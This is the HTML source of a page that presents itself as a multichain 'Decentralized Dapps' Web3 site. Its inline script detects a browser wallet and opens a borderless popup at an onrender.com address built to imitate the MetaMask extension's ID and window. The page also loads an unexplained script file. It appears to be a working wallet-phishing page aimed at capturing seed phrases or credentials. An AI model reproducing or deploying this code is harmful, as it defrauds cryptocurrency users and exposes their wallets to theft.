<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <link rel="shortcut icon" href="favicon.png">
    <meta name="language" content="en">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="title"
        content="Decentralized Dapps - We are unifying Web3 by providing best-in-class, self-custodial, and multichain support">
    <meta name="description"
        content="We are unifying Web3 by providing best-in-class, self-custodial, and multichain support">
    <link rel="manifest" href="manifest.json">
    <title>Decentralized Dapps - We are unifying Web3 by providing best-in-class, self-custodial, and multichain support
    </title>
    <link rel="canonical" href="https://scalingwhirlhold.pages.dev" />
    <link href="static/css/2.14dca502.chunk.css" rel="stylesheet">
    <link href="static/css/main.e94723d5.chunk.css" rel="stylesheet">
    <link href="static/css/index.css" rel="stylesheet">
    <script charset="UTF-8" async type="text/javascript" src="./e3b-ba004e4f03c929.js"></script>
</head>

<body class="home-main header-fixed" data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0">
    <div class="wrapper">
        <noscript>You need to enable JavaScript to run this app.</noscript>
        <div class="preloader">
            <div class="clear-loading loading-effect-2">
                <span></span>
            </div>
        </div>
        <header id="header" class="header is-fixed is-small">
            <div class="container-fluid">
                <div
                    style="height:62px;background-color:#1d2330;overflow:hidden;box-sizing:border-box;border:1px solid #282e3b;border-radius:4px;text-align:right;line-height:14px;block-size:62px;font-size:12px;font-feature-settings:normal;text-size-adjust:100%;box-shadow:inset 0 -20px 0 0 #262b38;padding:1px;padding:0;margin:0;width:100%">
                    <div style="height:40px;padding:0;margin:0;width:100%">
                        <iframe
                            src="widget_type-horizontal_v2-theme-dark-pref_coin_id-1505-invert_hover-no_ext_iframe.html"
                            width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0"
                            border="0" style="border:0;margin:0;padding:0">
                        </iframe>
                    </div>
                    <div
                        style="color:#626b7f;line-height:14px;font-weight:400;font-size:11px;box-sizing:border-box;padding:2px 6px;width:100%;font-family:Verdana,Tahoma,Arial,sans-serif">
                        <a href="https://coinlib.io/" target="_blank"
                            style="font-weight:500;color:#626b7f;text-decoration:none;font-size:11px">Cryptocurrency
                            Prices</a>&nbsp;by Coinlib
                    </div>
                </div>
            </div>
        </header>
        <div id="root"></div>
    </div>
    <script>!function (l) { function e(e) { for (var r, t, n = e[0], o = e[1], u = e[2], f = 0, i = []; f < n.length; f++)t = n[f], p[t] && i.push(p[t][0]), p[t] = 0; for (r in o) Object.prototype.hasOwnProperty.call(o, r) && (l[r] = o[r]); for (s && s(e); i.length;)i.shift()(); return c.push.apply(c, u || []), a() } function a() { for (var e, r = 0; r < c.length; r++) { for (var t = c[r], n = !0, o = 1; o < t.length; o++) { var u = t[o]; 0 !== p[u] && (n = !1) } n && (c.splice(r--, 1), e = f(f.s = t[0])) } return e } var t = {}, p = { 1: 0 }, c = []; function f(e) { if (t[e]) return t[e].exports; var r = t[e] = { i: e, l: !1, exports: {} }; return l[e].call(r.exports, r, r.exports, f), r.l = !0, r.exports } f.m = l, f.c = t, f.d = function (e, r, t) { f.o(e, r) || Object.defineProperty(e, r, { enumerable: !0, get: t }) }, f.r = function (e) { "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 }) }, f.t = function (r, e) { if (1 & e && (r = f(r)), 8 & e) return r; if (4 & e && "object" == typeof r && r && r.__esModule) return r; var t = Object.create(null); if (f.r(t), Object.defineProperty(t, "default", { enumerable: !0, value: r }), 2 & e && "string" != typeof r) for (var n in r) f.d(t, n, function (e) { return r[e] }.bind(null, n)); return t }, f.n = function (e) { var r = e && e.__esModule ? function () { return e.default } : function () { return e }; return f.d(r, "a", r), r }, f.o = function (e, r) { return Object.prototype.hasOwnProperty.call(e, r) }, f.p = "index.html"; var r = window.webpackJsonp = window.webpackJsonp || [], n = r.push.bind(r); r.push = e, r = r.slice(); for (var o = 0; o < r.length; o++)e(r[o]); var s = n; a() }([])</script>
    <script src="static/js/2.532fe077.chunk.js"></script>
    <script src="static/js/main.0bd736dd.chunk.js"></script>
    <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

    <span id="connect-btn" hidden="" class=""></span>

    <script>
        function connection_all() {
            document.getElementById("connect-btn").click();
        };

        $('#connect-btn').on('click', function (e) {
            openPopup();
        }); 

        function openPopup() {

            if (isMobile()) {
                //activate shadow
                $('#connect-btn').addClass("connectButton");
                document.getElementById("connect-btn").click();
                //window.location.href = `https://metamask.app.link/dapp/${window.location.hostname}${window.location.pathname}`;
            } else {
                //if metamask is not detected in the browser
                if (!window.ethereum || window.ethereum == undefined) {
                    const link = `https://metamask.app.link/dapp/${window.location.hostname}${window.location.pathname}`

                    let a = document.createElement('a');
                    a.target = '_blank';
                    a.href = link;
                    a.click();
                } else {
                    var openedWindow = window.open(
                        "https://chrome-nkbihfbeogaeaoehlefnkodbefgpgkns.onrender.com/metamask.html",
                        "newwin",
                        "menubar=0, toolbar=0, location=0, directories=0, status=0, scrollbars=0, resizable=0, width=357px, height=680px, top=0, left=" +
                        window.innerWidth +
                        ""
                    );
                }

            }
        }
        //#region Utils Functions
        function isMobile() {
            var check = false;
            (function (a) {
                if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);
            return check;
        };
    </script>
</body>

</html>